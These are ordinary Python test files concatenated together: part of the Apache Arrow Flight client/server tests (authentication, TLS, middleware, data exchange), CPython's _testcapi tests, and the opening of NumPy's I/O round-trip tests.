list(client.do_action(action))
@pytest.mark.skipif(os.name == 'nt',
reason="ARROW-10013: gRPC on Windows corrupts peer()")
def test_http_basic_auth():
"""Test a Python implementation of HTTP basic authentication."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
client.authenticate(HttpBasicClientAuthHandler('test', 'p4ssw0rd'))
results = client.do_action(action)
identity = next(results)
assert identity.body.to_pybytes() == b'test'
peer_address = next(results)
assert peer_address.body.to_pybytes() != b''
def test_http_basic_auth_invalid_password():
"""Test that auth fails with the wrong password."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
with pytest.raises(flight.FlightUnauthenticatedError,
match=".*wrong password.*"):
client.authenticate(HttpBasicClientAuthHandler('test', 'wrong'))
next(client.do_action(action))
def test_token_auth():
"""Test an auth mechanism that uses a handshake."""
with EchoStreamFlightServer(auth_handler=token_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
client.authenticate(TokenClientAuthHandler('test', 'p4ssw0rd'))
identity = next(client.do_action(action))
assert identity.body.to_pybytes() == b'test'
def test_token_auth_invalid():
"""Test an auth mechanism that uses a handshake."""
with EchoStreamFlightServer(auth_handler=token_auth_handler) as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightUnauthenticatedError):
client.authenticate(TokenClientAuthHandler('test', 'wrong'))
header_auth_server_middleware_factory = HeaderAuthServerMiddlewareFactory()
no_op_auth_handler = NoopAuthHandler()
def test_authenticate_basic_token():
"""Test authenticate_basic_token with bearer token and auth headers."""
with HeaderAuthFlightServer(auth_handler=no_op_auth_handler, middleware={
"auth": HeaderAuthServerMiddlewareFactory()
}) as server:
client = FlightClient(('localhost', server.port))
token_pair = client.authenticate_basic_token(b'test', b'password')
assert token_pair[0] == b'authorization'
assert token_pair[1] == b'Bearer token1234'
def test_authenticate_basic_token_invalid_password():
"""Test authenticate_basic_token with an invalid password."""
with HeaderAuthFlightServer(auth_handler=no_op_auth_handler, middleware={
"auth": HeaderAuthServerMiddlewareFactory()
}) as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightUnauthenticatedError):
client.authenticate_basic_token(b'test', b'badpassword')
def test_authenticate_basic_token_and_action():
"""Test authenticate_basic_token and doAction after authentication."""
with HeaderAuthFlightServer(auth_handler=no_op_auth_handler, middleware={
"auth": HeaderAuthServerMiddlewareFactory()
}) as server:
client = FlightClient(('localhost', server.port))
token_pair = client.authenticate_basic_token(b'test', b'password')
assert token_pair[0] == b'authorization'
assert token_pair[1] == b'Bearer token1234'
options = flight.FlightCallOptions(headers=[token_pair])
result = list(client.do_action(
action=flight.Action('test-action', b''), options=options))
assert result[0].body.to_pybytes() == b'token1234'
def test_authenticate_basic_token_with_client_middleware():
"""Test authenticate_basic_token with client middleware
to intercept authorization header returned by the
HTTP header auth enabled server.
"""
with HeaderAuthFlightServer(auth_handler=no_op_auth_handler, middleware={
"auth": HeaderAuthServerMiddlewareFactory()
}) as server:
client_auth_middleware = ClientHeaderAuthMiddlewareFactory()
client = FlightClient(
('localhost', server.port),
middleware=[client_auth_middleware]
)
encoded_credentials = base64.b64encode(b'test:password')
options = flight.FlightCallOptions(headers=[
(b'authorization', b'Basic ' + encoded_credentials)
])
result = list(client.do_action(
action=flight.Action('test-action', b''), options=options))
assert result[0].body.to_pybytes() == b'token1234'
assert client_auth_middleware.call_credential[0] == b'authorization'
assert client_auth_middleware.call_credential[1] == \
b'Bearer ' + b'token1234'
result2 = list(client.do_action(
action=flight.Action('test-action', b''), options=options))
assert result2[0].body.to_pybytes() == b'token1234'
assert client_auth_middleware.call_credential[0] == b'authorization'
assert client_auth_middleware.call_credential[1] == \
b'Bearer ' + b'token1234'
def test_arbitrary_headers_in_flight_call_options():
"""Test passing multiple arbitrary headers to the middleware."""
with ArbitraryHeadersFlightServer(
auth_handler=no_op_auth_handler,
middleware={
"auth": HeaderAuthServerMiddlewareFactory(),
"arbitrary-headers": ArbitraryHeadersServerMiddlewareFactory()
}) as server:
client = FlightClient(('localhost', server.port))
token_pair = client.authenticate_basic_token(b'test', b'password')
assert token_pair[0] == b'authorization'
assert token_pair[1] == b'Bearer token1234'
options = flight.FlightCallOptions(headers=[
token_pair,
(b'test-header-1', b'value1'),
(b'test-header-2', b'value2')
])
result = list(client.do_action(flight.Action(
"test-action", b""), options=options))
assert result[0].body.to_pybytes() == b'value1'
assert result[1].body.to_pybytes() == b'value2'
def test_location_invalid():
"""Test constructing invalid URIs."""
with pytest.raises(pa.ArrowInvalid, match=".*Cannot parse URI:.*"):
flight.connect("%")
with pytest.raises(pa.ArrowInvalid, match=".*Cannot parse URI:.*"):
ConstantFlightServer("%")
def test_location_unknown_scheme():
"""Test creating locations for unknown schemes."""
assert flight.Location("s3://foo").uri == b"s3://foo"
assert flight.Location("https://example.com/bar.parquet").uri == \
b"https://example.com/bar.parquet"
@pytest.mark.slow
@pytest.mark.requires_testing_data
def test_tls_fails():
"""Make sure clients cannot connect when cert verification fails."""
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
# Ensure client doesn't connect when certificate verification
# fails (this is a slow test since gRPC does retry a few times)
client = FlightClient("grpc+tls://localhost:" + str(s.port))
# gRPC error messages change based on version, so don't look
# for a particular error
with pytest.raises(flight.FlightUnavailableError):
client.do_get(flight.Ticket(b'ints')).read_all()
@pytest.mark.requires_testing_data
def test_tls_do_get():
"""Try a simple do_get call over TLS."""
table = simple_ints_table()
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
client = FlightClient(('localhost', s.port),
tls_root_certs=certs["root_cert"])
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
@pytest.mark.requires_testing_data
def test_tls_disable_server_verification():
"""Try a simple do_get call over TLS with server verification disabled."""
table = simple_ints_table()
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
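# Disabling server verification may not be supported by the underlying
# gRPC build; FlightClient then raises NotImplementedError and the test
# is skipped rather than failed.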
try:
client = FlightClient(('localhost', s.port),
disable_server_verification=True)
except NotImplementedError:
pytest.skip('disable_server_verification feature is not available')
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
@pytest.mark.requires_testing_data
def test_tls_override_hostname():
"""Check that incorrectly overriding the hostname fails."""
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
client = flight.connect(('localhost', s.port),
tls_root_certs=certs["root_cert"],
override_hostname="fakehostname")
with pytest.raises(flight.FlightUnavailableError):
client.do_get(flight.Ticket(b'ints'))
def test_flight_do_get_metadata():
"""Try a simple do_get call with metadata."""
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
batches = []
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b''))
idx = 0
while True:
try:
batch, metadata = reader.read_chunk()
batches.append(batch)
server_idx, = struct.unpack('<i', metadata.to_pybytes())
assert idx == server_idx
idx += 1
except StopIteration:
break
data = pa.Table.from_batches(batches)
assert data.equals(table)
def test_flight_do_get_metadata_v4():
"""Try a simple do_get call with V4 metadata version."""
table = pa.Table.from_arrays(
[pa.array([-10, -5, 0, 5, 10])], names=['a'])
options = pa.ipc.IpcWriteOptions(
metadata_version=pa.ipc.MetadataVersion.V4)
with MetadataFlightServer(options=options) as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b''))
data = reader.read_all()
assert data.equals(table)
def test_flight_do_put_metadata():
"""Try a simple do_put call with metadata."""
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, metadata_reader = client.do_put(
flight.FlightDescriptor.for_path(''),
table.schema)
with writer:
for idx, batch in enumerate(table.to_batches(max_chunksize=1)):
metadata = struct.pack('<i', idx)
writer.write_with_metadata(batch, metadata)
buf = metadata_reader.read()
assert buf is not None
server_idx, = struct.unpack('<i', buf.to_pybytes())
assert idx == server_idx
def test_flight_do_put_limit():
"""Try a simple do_put call with a size limit."""
large_batch = pa.RecordBatch.from_arrays([
pa.array(np.ones(768, dtype=np.int64())),
], names=['a'])
with EchoFlightServer() as server:
client = FlightClient(('localhost', server.port),
write_size_limit_bytes=4096)
writer, metadata_reader = client.do_put(
flight.FlightDescriptor.for_path(''),
large_batch.schema)
with writer:
with pytest.raises(flight.FlightWriteSizeExceededError,
match="exceeded soft limit") as excinfo:
writer.write_batch(large_batch)
assert excinfo.value.limit == 4096
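# Each half of the batch (384 int64 values, roughly 3 KB) stays under the
# 4096-byte soft limit, so the retried writes below succeed.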
smaller_batches = [
large_batch.slice(0, 384),
large_batch.slice(384),
]
for batch in smaller_batches:
writer.write_batch(batch)
expected = pa.Table.from_batches([large_batch])
actual = client.do_get(flight.Ticket(b'')).read_all()
assert expected == actual
@pytest.mark.slow
def test_cancel_do_get():
"""Test canceling a DoGet operation on the client side."""
with ConstantFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b'ints'))
reader.cancel()
with pytest.raises(flight.FlightCancelledError, match=".*Cancel.*"):
reader.read_chunk()
@pytest.mark.slow
def test_cancel_do_get_threaded():
"""Test canceling a DoGet operation from another thread."""
with SlowFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b'ints'))
read_first_message = threading.Event()
stream_canceled = threading.Event()
result_lock = threading.Lock()
raised_proper_exception = threading.Event()
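# The helper thread reads one chunk, signals the main thread, waits for
# the cancel, and then expects FlightCancelledError on its next read.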
def block_read():
reader.read_chunk()
read_first_message.set()
stream_canceled.wait(timeout=5)
try:
reader.read_chunk()
except flight.FlightCancelledError:
with result_lock:
raised_proper_exception.set()
thread = threading.Thread(target=block_read, daemon=True)
thread.start()
read_first_message.wait(timeout=5)
reader.cancel()
stream_canceled.set()
thread.join(timeout=1)
with result_lock:
assert raised_proper_exception.is_set()
def test_roundtrip_types():
"""Make sure serializable types round-trip."""
ticket = flight.Ticket("foo")
assert ticket == flight.Ticket.deserialize(ticket.serialize())
desc = flight.FlightDescriptor.for_command("test")
assert desc == flight.FlightDescriptor.deserialize(desc.serialize())
desc = flight.FlightDescriptor.for_path("a", "b", "test.arrow")
assert desc == flight.FlightDescriptor.deserialize(desc.serialize())
info = flight.FlightInfo(
pa.schema([('a', pa.int32())]),
desc,
[
flight.FlightEndpoint(b'', ['grpc://test']),
flight.FlightEndpoint(
b'',
[flight.Location.for_grpc_tcp('localhost', 5005)],
),
],
-1,
-1,
)
info2 = flight.FlightInfo.deserialize(info.serialize())
assert info.schema == info2.schema
assert info.descriptor == info2.descriptor
assert info.total_bytes == info2.total_bytes
assert info.total_records == info2.total_records
assert info.endpoints == info2.endpoints
def test_roundtrip_errors():
"""Ensure that Flight errors propagate from server to client."""
with ErrorFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightInternalError, match=".*foo.*"):
list(client.do_action(flight.Action("internal", b"")))
with pytest.raises(flight.FlightTimedOutError, match=".*foo.*"):
list(client.do_action(flight.Action("timedout", b"")))
with pytest.raises(flight.FlightCancelledError, match=".*foo.*"):
list(client.do_action(flight.Action("cancel", b"")))
with pytest.raises(flight.FlightUnauthenticatedError, match=".*foo.*"):
list(client.do_action(flight.Action("unauthenticated", b"")))
with pytest.raises(flight.FlightUnauthorizedError, match=".*foo.*"):
list(client.do_action(flight.Action("unauthorized", b"")))
with pytest.raises(flight.FlightInternalError, match=".*foo.*"):
list(client.list_flights())
def test_do_put_independent_read_write():
"""Ensure that separate threads can read/write on a DoPut."""
# ARROW-6063: previously this would cause gRPC to abort when the
# writer was closed (due to simultaneous reads), or would hang
# forever.
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, metadata_reader = client.do_put(
flight.FlightDescriptor.for_path(''),
table.schema)
count = [0]
def _reader_thread():
while metadata_reader.read() is not None:
count[0] += 1
thread = threading.Thread(target=_reader_thread)
thread.start()
batches = table.to_batches(max_chunksize=1)
with writer:
for idx, batch in enumerate(batches):
metadata = struct.pack('<i', idx)
writer.write_with_metadata(batch, metadata)
# Causes the server to stop writing and end the call
writer.done_writing()
# Thus reader thread will break out of loop
thread.join()
# writer.close() won't segfault since reader thread has
# stopped
assert count[0] == len(batches)
def test_server_middleware_same_thread():
"""Ensure that server middleware run on the same thread as the RPC."""
with HeaderFlightServer(middleware={
"test": HeaderServerMiddlewareFactory(),
}) as server:
client = FlightClient(('localhost', server.port))
results = list(client.do_action(flight.Action(b"test", b"")))
assert len(results) == 1
value = results[0].body.to_pybytes()
assert b"right value" == value
def test_middleware_reject():
"""Test rejecting an RPC with server middleware."""
with HeaderFlightServer(middleware={
"test": SelectiveAuthServerMiddlewareFactory(),
}) as server:
client = FlightClient(('localhost', server.port))
# The middleware allows this through without auth.
with pytest.raises(pa.ArrowNotImplementedError):
list(client.list_actions())
# But not anything else.
with pytest.raises(flight.FlightUnauthenticatedError):
list(client.do_action(flight.Action(b"", b"")))
client = FlightClient(
('localhost', server.port),
middleware=[SelectiveAuthClientMiddlewareFactory()]
)
response = next(client.do_action(flight.Action(b"", b"")))
assert b"password" == response.body.to_pybytes()
def test_middleware_mapping():
"""Test that middleware records methods correctly."""
server_middleware = RecordingServerMiddlewareFactory()
client_middleware = RecordingClientMiddlewareFactory()
with FlightServerBase(middleware={"test": server_middleware}) as server:
client = FlightClient(
('localhost', server.port),
middleware=[client_middleware]
)
descriptor = flight.FlightDescriptor.for_command(b"")
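# Every RPC below hits the default FlightServerBase implementation, which
# raises NotImplementedError, but the recording middleware on both sides
# still logs which Flight method was invoked.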
with pytest.raises(NotImplementedError):
list(client.list_flights())
with pytest.raises(NotImplementedError):
client.get_flight_info(descriptor)
with pytest.raises(NotImplementedError):
client.get_schema(descriptor)
with pytest.raises(NotImplementedError):
client.do_get(flight.Ticket(b""))
with pytest.raises(NotImplementedError):
writer, _ = client.do_put(descriptor, pa.schema([]))
writer.close()
with pytest.raises(NotImplementedError):
list(client.do_action(flight.Action(b"", b"")))
with pytest.raises(NotImplementedError):
list(client.list_actions())
with pytest.raises(NotImplementedError):
writer, _ = client.do_exchange(descriptor)
writer.close()
expected = [
flight.FlightMethod.LIST_FLIGHTS,
flight.FlightMethod.GET_FLIGHT_INFO,
flight.FlightMethod.GET_SCHEMA,
flight.FlightMethod.DO_GET,
flight.FlightMethod.DO_PUT,
flight.FlightMethod.DO_ACTION,
flight.FlightMethod.LIST_ACTIONS,
flight.FlightMethod.DO_EXCHANGE,
]
assert server_middleware.methods == expected
assert client_middleware.methods == expected
def test_extra_info():
with ErrorFlightServer() as server:
client = FlightClient(('localhost', server.port))
try:
list(client.do_action(flight.Action("protobuf", b"")))
assert False
except flight.FlightUnauthorizedError as e:
assert e.extra_info is not None
ei = e.extra_info
assert ei == b'this is an error message'
@pytest.mark.requires_testing_data
def test_mtls():
"""Test mutual TLS (mTLS) with gRPC."""
certs = example_tls_certs()
table = simple_ints_table()
with ConstantFlightServer(
tls_certificates=[certs["certificates"][0]],
verify_client=True,
root_certificates=certs["root_cert"]) as s:
client = FlightClient(
('localhost', s.port),
tls_root_certs=certs["root_cert"],
cert_chain=certs["certificates"][0].cert,
private_key=certs["certificates"][0].key)
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
def test_doexchange_get():
"""Emulate DoGet with DoExchange."""
expected = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
with ExchangeFlightServer() as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"get")
writer, reader = client.do_exchange(descriptor)
with writer:
table = reader.read_all()
assert expected == table
def test_doexchange_put():
"""Emulate DoPut with DoExchange."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
batches = data.to_batches(max_chunksize=512)
with ExchangeFlightServer() as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"put")
writer, reader = client.do_exchange(descriptor)
with writer:
writer.begin(data.schema)
for batch in batches:
writer.write_batch(batch)
writer.done_writing()
chunk = reader.read_chunk()
assert chunk.data is None
expected_buf = str(len(batches)).encode("utf-8")
assert chunk.app_metadata == expected_buf
def test_doexchange_echo():
"""Try a DoExchange echo server."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
batches = data.to_batches(max_chunksize=512)
with ExchangeFlightServer() as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"echo")
writer, reader = client.do_exchange(descriptor)
with writer:
# Read/write metadata before starting data.
for i in range(10):
buf = str(i).encode("utf-8")
writer.write_metadata(buf)
chunk = reader.read_chunk()
assert chunk.data is None
assert chunk.app_metadata == buf
# Now write data without metadata.
writer.begin(data.schema)
for batch in batches:
writer.write_batch(batch)
assert reader.schema == data.schema
chunk = reader.read_chunk()
assert chunk.data == batch
assert chunk.app_metadata is None
# And write data with metadata.
for i, batch in enumerate(batches):
buf = str(i).encode("utf-8")
writer.write_with_metadata(batch, buf)
chunk = reader.read_chunk()
assert chunk.data == batch
assert chunk.app_metadata == buf
def test_doexchange_echo_v4():
"""Try a DoExchange echo server using the V4 metadata version."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
batches = data.to_batches(max_chunksize=512)
options = pa.ipc.IpcWriteOptions(
metadata_version=pa.ipc.MetadataVersion.V4)
with ExchangeFlightServer(options=options) as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"echo")
writer, reader = client.do_exchange(descriptor)
with writer:
# Now write data without metadata.
writer.begin(data.schema, options=options)
for batch in batches:
writer.write_batch(batch)
assert reader.schema == data.schema
chunk = reader.read_chunk()
assert chunk.data == batch
assert chunk.app_metadata is None
def test_doexchange_transform():
"""Transform a table with a service."""
data = pa.Table.from_arrays([
pa.array(range(0, 1024)),
pa.array(range(1, 1025)),
pa.array(range(2, 1026)),
], names=["a", "b", "c"])
expected = pa.Table.from_arrays([
pa.array(range(3, 1024 * 3 + 3, 3)),
], names=["sum"])
with ExchangeFlightServer() as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"transform")
writer, reader = client.do_exchange(descriptor)
with writer:
writer.begin(data.schema)
writer.write_table(data)
writer.done_writing()
table = reader.read_all()
assert expected == table
def test_middleware_multi_header():
"""Test sending/receiving multiple (binary-valued) headers."""
with MultiHeaderFlightServer(middleware={
"test": MultiHeaderServerMiddlewareFactory(),
}) as server:
headers = MultiHeaderClientMiddlewareFactory()
client = FlightClient(('localhost', server.port), middleware=[headers])
response = next(client.do_action(flight.Action(b"", b"")))
# The server echoes the headers it got back to us.
raw_headers = response.body.to_pybytes().decode("utf-8")
client_headers = ast.literal_eval(raw_headers)
# Don't directly compare; gRPC may add headers like User-Agent.
for header, values in MultiHeaderClientMiddleware.EXPECTED.items():
assert client_headers.get(header) == values
assert headers.last_headers.get(header) == values
@pytest.mark.requires_testing_data
def test_generic_options():
"""Test setting generic client options."""
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
# Try setting a string argument that will make requests fail
options = [("grpc.ssl_target_name_override", "fakehostname")]
client = flight.connect(('localhost', s.port),
tls_root_certs=certs["root_cert"],
generic_options=options)
with pytest.raises(flight.FlightUnavailableError):
client.do_get(flight.Ticket(b'ints'))
# Try setting an int argument that will make requests fail
options = [("grpc.max_receive_message_length", 32)]
client = flight.connect(('localhost', s.port),
tls_root_certs=certs["root_cert"],
generic_options=options)
with pytest.raises(pa.ArrowInvalid):
client.do_get(flight.Ticket(b'ints'))
class CancelFlightServer(FlightServerBase):
"""A server for testing StopToken."""
def do_get(self, context, ticket):
schema = pa.schema([])
rb = pa.RecordBatch.from_arrays([], schema=schema)
return flight.GeneratorStream(schema, itertools.repeat(rb))
def do_exchange(self, context, descriptor, reader, writer):
schema = pa.schema([])
rb = pa.RecordBatch.from_arrays([], schema=schema)
writer.begin(schema)
while not context.is_cancelled():
writer.write_batch(rb)
time.sleep(0.5)
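# Both handlers above stream indefinitely: do_get returns an endless
# GeneratorStream of empty batches and do_exchange keeps writing until the
# call is cancelled, so client reads only finish when interrupted.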
def test_interrupt():
if threading.current_thread().ident != threading.main_thread().ident:
pytest.skip("test only works from main Python thread")
# Skips test if not available
raise_signal = util.get_raise_signal()
def signal_from_thread():
time.sleep(0.5)
raise_signal(signal.SIGINT)
exc_types = (KeyboardInterrupt, pa.ArrowCancelled)
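# A helper thread raises SIGINT in the main thread while read_all()
# blocks; the read should abort with KeyboardInterrupt or
# pa.ArrowCancelled (the exc_types checked below).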
def test(read_all):
try:
try:
t = threading.Thread(target=signal_from_thread)
with pytest.raises(exc_types) as exc_info:
t.start()
read_all()
finally:
t.join()
except KeyboardInterrupt:
# In case KeyboardInterrupt didn't interrupt read_all
# above, at least prevent it from stopping the test suite
pytest.fail("KeyboardInterrupt didn't interrupt Flight read_all")
e = exc_info.value.__context__
assert isinstance(e, pa.ArrowCancelled) or \
isinstance(e, KeyboardInterrupt)
with CancelFlightServer() as server:
client = FlightClient(("localhost", server.port))
reader = client.do_get(flight.Ticket(b""))
test(reader.read_all)
descriptor = flight.FlightDescriptor.for_command(b"echo")
writer, reader = client.do_exchange(descriptor)
test(reader.read_all)
def test_never_sends_data():
# Regression test for ARROW-12779
match = "application server implementation error"
with NeverSendsDataFlightServer() as server:
client = flight.connect(('localhost', server.port))
with pytest.raises(flight.FlightServerError, match=match):
client.do_get(flight.Ticket(b'')).read_all()
# Check that the server handler will ignore empty tables
# up to a certain extent
table = client.do_get(flight.Ticket(b'yield_data')).read_all()
assert table.num_rows == 5
@pytest.mark.large_memory
@pytest.mark.slow
def test_large_descriptor():
# Regression test for ARROW-13253. Placed here with appropriate marks
# since some CI pipelines can't run the C++ equivalent
large_descriptor = flight.FlightDescriptor.for_command(
b' ' * (2 ** 31 + 1))
with FlightServerBase() as server:
client = flight.connect(('localhost', server.port))
with pytest.raises(OSError,
match="Failed to serialize Flight descriptor"):
writer, _ = client.do_put(large_descriptor, pa.schema([]))
writer.close()
with pytest.raises(pa.ArrowException,
match="Failed to serialize Flight descriptor"):
client.do_exchange(large_descriptor)
@pytest.mark.large_memory
@pytest.mark.slow
def test_large_metadata_client():
# Regression test for ARROW-13253
descriptor = flight.FlightDescriptor.for_command(b'')
metadata = b' ' * (2 ** 31 + 1)
with EchoFlightServer() as server:
client = flight.connect(('localhost', server.port))
with pytest.raises(pa.ArrowCapacityError,
match="app_metadata size overflow"):
writer, _ = client.do_put(descriptor, pa.schema([]))
with writer:
writer.write_metadata(metadata)
writer.close()
with pytest.raises(pa.ArrowCapacityError,
match="app_metadata size overflow"):
writer, reader = client.do_exchange(descriptor)
with writer:
writer.write_metadata(metadata)
del metadata
with LargeMetadataFlightServer() as server:
client = flight.connect(('localhost', server.port))
with pytest.raises(flight.FlightServerError,
match="app_metadata size overflow"):
reader = client.do_get(flight.Ticket(b''))
reader.read_all()
with pytest.raises(pa.ArrowException,
match="app_metadata size overflow"):
writer, reader = client.do_exchange(descriptor)
with writer:
reader.read_all()
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by definition,
# these are all functions _testcapi exports whose name begins with 'test_'.
from __future__ import with_statement
import sys
import time
import random
import unittest
from test import test_support as support
try:
import thread
import threading
except ImportError:
thread = None
threading = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
skips = []
if support.check_impl_detail(pypy=True):
skips += [
'test_broken_memoryview',
'test_capsule',
'test_lazy_hash_inheritance',
'test_widechar',
'TestThreadState',
'TestPendingCalls',
]
@unittest.skipUnless(threading and 'TestPendingCalls' not in skips, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break
def pendingcalls_wait(self, l, n, context=None):
#now, stick around until len(l) has grown to n
count = 0
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print "(%i)"%(len(l),),
for i in xrange(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print "(%i)"%(len(l),)
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print "finished threads: ", nFinished
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
@unittest.skipUnless(threading and thread and 'TestThreadState' not in skips, 'Threading required for this test.')
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(thread.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(thread.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
def test_main():
for name in dir(_testcapi):
if name.startswith('test_') and name not in skips:
test = getattr(_testcapi, name)
if support.verbose:
print "internal", name
try:
test()
except _testcapi.error:
raise support.TestFailed, sys.exc_info()[1]
support.run_unittest(TestPendingCalls, TestThreadState)
if __name__ == "__main__":
test_main()
|
test_io.py
|
from __future__ import division, absolute_import, print_function
import sys
import gzip
import os
import threading
from tempfile import mkstemp, mktemp, NamedTemporaryFile
import time
import warnings
import gc
from io import BytesIO
from datetime import datetime
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import ConverterError, ConverterLockError, \
ConversionWarning
from numpy.compat import asbytes, asbytes_nested, bytes, asstr
from nose import SkipTest
from numpy.ma.testutils import (TestCase, assert_equal, assert_array_equal,
assert_raises, run_module_suite)
from numpy.testing import assert_warns, assert_, build_err_msg
class TextIO(BytesIO):
"""Helper IO class.
Write calls encode strings to bytes if needed; reads return bytes.
This makes it easier to emulate files opened in binary mode
without needing to explicitly convert strings to bytes in
setting up the test data.
"""
def __init__(self, s=""):
BytesIO.__init__(self, asbytes(s))
def write(self, s):
BytesIO.write(self, asbytes(s))
def writelines(self, lines):
BytesIO.writelines(self, [asbytes(s) for s in lines])
MAJVER, MINVER = sys.version_info[:2]
IS_64BIT = sys.maxsize > 2**32
def strptime(s, fmt=None):
"""This function is available in the datetime module only
from Python >= 2.5.
"""
if sys.version_info[0] >= 3:
return datetime(*time.strptime(s.decode('latin1'), fmt)[:3])
else:
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
# Do not delete the file on windows, because we can't
# reopen an already opened file on that platform, so we
# need to close the file and reopen it, implying no
# automatic deletion.
if sys.platform == 'win32' and MAJVER >= 2 and MINVER >= 6:
target_file = NamedTemporaryFile(delete=False)
else:
target_file = NamedTemporaryFile()
load_file = target_file.name
else:
target_file = BytesIO()
load_file = target_file
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
self.roundtrip(a)
a = np.array([[1, 2], [3, 4]], int)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.roundtrip(a)
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@np.testing.dec.knownfailureif(sys.platform == 'win32', "Fail on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.roundtrip(a)
